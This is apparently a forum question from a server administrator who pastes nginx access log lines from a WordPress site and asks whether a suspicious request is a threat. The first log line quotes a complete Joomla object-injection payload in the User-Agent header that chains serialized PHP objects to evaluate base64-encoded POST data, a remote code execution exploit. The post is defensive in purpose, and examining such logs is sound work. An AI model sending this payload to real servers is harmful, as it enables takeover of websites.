I have a server running ubuntu 14.04. On it i have latest wordpress version on nginx. I was going trough my logs and noticed this.
198.204.224.122 - - [05/Dec/2017:13:06:10 +0200] "GET / HTTP/1.1" 200 826 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:4:\x22\x5C0\x5C0\x5C0a\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:5:\x22cache\x22;b:1;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:10:\x22javascript\x22;i:9999;s:8:\x22feed_url\x22;s:54:\x22eval(base64_decode($_POST[111]));JFactory::get();exit;\x22;}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;i:1;}\xF0\x9D\x8C\x86"
I looked around the internet and i found that it use to be joomla problem but im still worried because i see that that request was handled with status code 200. Later on i noticed this happening in my logs
162.158.92.173 0.058 - [05/Dec/2017:13:35:13 +0200] "GET /wp-admin/users.php HTTP/1.1" 200 10389 " /wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.002 - [05/Dec/2017:13:35:13 +0200] "GET /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,svg-painter,heartbeat,wp-auth-check&ver=4.9.1 HTTP/1.1" 200 12580 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.035 - [05/Dec/2017:13:36:14 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.033 - [05/Dec/2017:13:37:15 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.030 - [05/Dec/2017:13:39:16 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.028 - [05/Dec/2017:13:41:17 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.033 - [05/Dec/2017:13:43:18 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.031 - [05/Dec/2017:13:45:19 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.030 - [05/Dec/2017:13:47:28 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.060 - [05/Dec/2017:13:47:29 +0200] "GET /wp-admin/users.php HTTP/1.1" 200 10389 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" 162.158.92.173 0.029 - [05/Dec/2017:13:48:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 " /wp-admin/users.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47"
Should i be worried ? By the way i am running fail2ban however i have cloudflare aswell which makes it harder for me to ban the ips.